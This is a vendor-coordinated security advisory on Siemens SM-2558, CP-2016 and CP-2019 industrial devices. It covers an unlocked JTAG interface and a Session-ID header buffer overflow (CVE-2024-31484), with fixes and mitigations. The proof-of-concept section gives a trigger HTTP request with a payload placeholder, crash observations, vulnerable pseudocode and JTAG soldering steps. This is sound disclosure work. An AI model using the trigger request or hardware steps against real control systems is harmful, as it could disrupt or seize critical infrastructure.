SEC Consult Vulnerability Lab Security Advisory < 20241125-0 >
=======================================================================
              title: Unlocked JTAG interface and buffer overflow
            product: Siemens SM-2558 Protocol Element (extension module for
                     Siemens SICAM AK3/TM/BC),
                     Siemens CP-2016 & CP-2019
 vulnerable version: JTAG: Unknown HW revision, Zynq Firmware Version 10A45
                     Buffer overflow: <V10.46 (ETA4), <V03.27 (ETA5),
                     <V06.02 (CPCX26), <V06.05 (PCCX26)
      fixed version: JTAG: SM-2558 hardware is EOL
                     Buffer overflow: V06.02 (CPCX26), V10.46 (ETA4),
                     V03.27 (ETA5), V06.05 (PCCX26)
             impact: High
           homepage: https://www.siemens.com
              found: 2023-07-11
                 by: Stefan Viehböck (Office Linz)
                     Constantin Schieber-Knöbl (Office Vienna)
                     SEC Consult Vulnerability Lab

                     An integrated part of SEC Consult, an Eviden business
                     Europe | Asia

                     https://www.sec-consult.com

=======================================================================

Vendor description:
-------------------
"We are a technology company focused on industry, infrastructure,
transport, and healthcare. From more resource-efficient factories,
resilient supply chains, and smarter buildings and grids, to cleaner
and more comfortable transportation as well as advanced healthcare,
we create technology with purpose adding real value for customers."

Source: https://new.siemens.com/global/en/company/about.html


Business recommendation:
------------------------
Upgrade to the latest firmware version to mitigate the buffer overflow.

The hardware (SM-2558) is considered end of life (EOL), thus no new
version with a fixed JTAG will be released. Restrict physical access
to the device.

SEC Consult highly recommends to perform a thorough security review of the
product conducted by security professionals to identify and resolve potential
further security issues.


Vulnerability overview/description:
-----------------------------------
1) Unlocked JTAG Interface of Zynq-7000 on SM-2558
The JTAG interface can be accessed with physical access to the PCB.
After slightly modifying the hardware it is possible to connect to
the interface with full access to the communication module.

2) Buffer Overflow on the Webserver of the SM-2558, CP-2016 & CP-2019 (CVE-2024-31484)
The webserver running on the SM-2558 device as well as CP-2016 and CP-2019
is vulnerable to a buffer overflow vulnerability.

The value of the HTTP header "Session-ID" is processed and used in an
"sprintf" call without proper length checking. The target buffer is in the
BSS segment and likely 1024 bytes in length. The buffer overflows into several
other global data structures.


Proof of concept:
-----------------
1) Unlocked JTAG Interface of Zynq-7000 on SM-2558
The JTAG interface pins (TDI, TDO, TCK, TMS, GND) are accessible on a populated
20-pin header on the PCB (see [figure_1]).

A removed connection needs to be restored by soldering an additional wire
between two exposed contacts (see [figure_2]), as the JTAG interface of the
Zynq-7000 is daisy-chained with the JTAG interface of the Broadcom BCM53101M
Ethernet controller. The pad in question connects to pin A57 (TDI) of the Ethernet
controller. After connecting to the pins, a connection to the Zynq-7000 JTAG
interface is possible. E.g., memory can be dumped ([figure_5]), execution can be
single stepped  ([figure_4]) or halted ([figure_3]), and variables changed.
This grants an attacker with physical access full control of the communication
module.


2) Buffer Overflow on the Webserver of the SM-2558, CP-2016 & CP-2019 (CVE-2024-31484)
The vulnerability can be triggered with a HTTP POST request similar to the
following one:

POST /SICAM_TOOLBOX_1703_remote_connection_01.htm HTTP/1.1
User-Agent: SICAM TOOLBOX II
Version: 1
Session-ID: 3814280BA9922f30_BOF_PAYLOAD_HERE
Sequence-ID: 525
Content-Length: 54
Content-Type: text/plain
KeepAlive: 5
Connection: close

type=1&length=15&data=0780640202fef1e60000feff0100c2


Here are a few observations with different Session-ID values:

a) Session ID value 3814280BA9922f30 results in normal behavior
HTTP/1.1 200 OK
Server: SICAM 1703
Version: 1
Session-ID: 3814280BA992fd0
Sequence-ID: 1
Content-Type: text/plain
Content-Length: 8

type=4

b) Session ID value 3814280BA992fd00000000000000 results in normal behavior
HTTP/1.1 200 OK
Server: SICAM 1703
Version: 1
Session-ID: 3814280BA992fd00000000000000
Sequence-ID: 1
Content-Type: text/plain
Content-Length: 0

c) Session ID value 3814280BA992fd00000000000000... (in total 618 characters) results in three HTTP responses
HTTP/1.1 200 OK
Server: SICAM 1703
Version: 1
Session-ID: 3814280BA992fd000000HTTP/1.1 200 OK
Server: SICAM 1703
Version: 1
Session-ID: 3814280BA992fd000000HTTP/1.1 200 OK
Server: SICAM 1703
Version: 1
Session-ID: 3814280BA992
Sequence-ID: 1
Content-Type: text/plain
Content-Length: 8

type=4

d) Session ID value 3814280BA992fd00000000000000... (in total 1260 characters) results in a HTTP 500 - internal server error
HTTP/1.1 500 Internal Server Error
Content-Type: text/html
Content-Length: 198

<html><head><title>500 Internal Server Error</title></head><body><h1>Internal Server Error</h1><p>Sorry, an unexpected internal server error occurred while processing your request.</p></body></html>


Pseudocode of vulnerable function:
[...]
    sessiond_id = (char *)get_http_header(a1, (int)"Session-ID"); <<<<<<<<<<<<<<<< session_id is extracted from HTTP request
    if ( !sessiond_id )
      goto LABEL_194;
    if ( unk_51CD1C )
    {
      v11 = 0;
    }
    else
    {
      sub_3DB0E4((unsigned int)byte_51CD08, (unsigned int)sessiond_id, 0x14u);
      v11 = 1;
    }
    if ( sub_15332C() == 1 )
    {
      v134 = 0;
      if ( sub_155BC4(a1, (int)v133) || !v134 )
      {
LABEL_49:
        sequence_id = get_http_header_int(a1, "Sequence-ID");
        sprintf(                      <<<<<<<<<<<<<<<< response_buffer overflows here
          response_buffer,
          "HTTP/1.1 200 OK\r\n"
          "Server: %s\r\n"
          "Version: %u\r\n"
          "Session-ID: %s\r\n"
          "Sequence-ID: %lu\r\n"
          "Content-Type: text/plain\r\n"
          "Content-Length: 0\r\n"
          "\r\n",
          "SICAM 1703",
          1,
          sessiond_id,
          sequence_id);
[...]


Vulnerable / tested versions:
-----------------------------
The following version has been tested which was the latest version available
at the time of the test:
- Webserver that runs on Firmware Version 10A45 of the Zynq FPGA.
- The Hardware revision of the device was unknown.

According to the vendor, the following firmware versions for the SM-2558
are affected by CVE-2024-31484:
* ETA4 Ethernet Interface IEC60870-5-104: All versions < V10.46
* ETA5 Ethernet Int. 1x100TX IEC61850 Ed.2: All versions < V03.27

Note that the same vulnerability exists as well in other products'
firmware versions, namely:
* CPCX26 Central Processing/Communication for CP-2016: All versions < V06.02
* PCCX26 Ax 1703 PE, Contr, Communication Element for CP-2019: All versions < V06.05


Vendor contact timeline:
------------------------
2024-03-05: Contacting vendor through productcert@siemens.com
2024-03-06: Siemens tracks this as #22436
2024-04-03: Requested status update.
2024-04-03: Siemens can reproduce vulnerabilities and will evaluate buffer overflow.
            Hardware is EOL, no fix for the JTAG issue.
2024-06-11: Siemens publishes SSA-620338 and confirms the buffer overflow.
2024-07 - 2024-09: Various vacation / absences, delaying advisory coordination.
2024-10-22: Meeting with ProductCERT, discussing release of SM-2558 advisory.
2024-10-31: Sending advisory draft to ProductCERT.
2024-11-14: Receiving feedback on advisory draft.
2024-11-19: Sending updated advisory to ProductCERT.
2024-11-25: Coordinated release of advisory.


Solution:
---------
The vendor provides patches for the affected devices / components
to fix CVE-2024-31484:
* ETA4 for SM-2558: Upgrade to V10.46
* ETA5 for SM-2558: Upgrade to V03.27
* CPCX26 for CP-2016: Upgrade to V06.02
* PCCX26 for CP-2019: Upgrade to V06.05

More detailed information can be found in the Siemens Security Advisory SSA-620338:
https://cert-portal.siemens.com/productcert/html/ssa-620338.html

The hardware (SM-2558) is considered end of life (EOL), thus no new version
with a fixed JTAG will be released. Restrict physical access to the device.


Workaround:
-----------
Make sure to strictly limit physical access to the PLCs containing the protocol
element during and also after its life cycle.


Advisory URL:
-------------
https://sec-consult.com/vulnerability-lab/


~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

SEC Consult Vulnerability Lab
An integrated part of SEC Consult, an Eviden business
Europe | Asia

About SEC Consult Vulnerability Lab
The SEC Consult Vulnerability Lab is an integrated part of SEC Consult, an
Eviden business. It ensures the continued knowledge gain of SEC Consult in the
field of network and application security to stay ahead of the attacker. The
SEC Consult Vulnerability Lab supports high-quality penetration testing and
the evaluation of new offensive and defensive technologies for our customers.
Hence our customers obtain the most current information about vulnerabilities
and valid recommendation about the risk profile of new technologies.

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Interested to work with the experts of SEC Consult?
Send us your application https://sec-consult.com/career/

Interested in improving your cyber security with the experts of SEC Consult?
Contact our local offices https://sec-consult.com/contact/
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Mail: security-research at sec-consult dot com
Web: https://www.sec-consult.com
Blog: https://blog.sec-consult.com
Twitter: https://twitter.com/sec_consult

EOF Constantin Schieber-Knöbl, Stefan Viehböck / @2024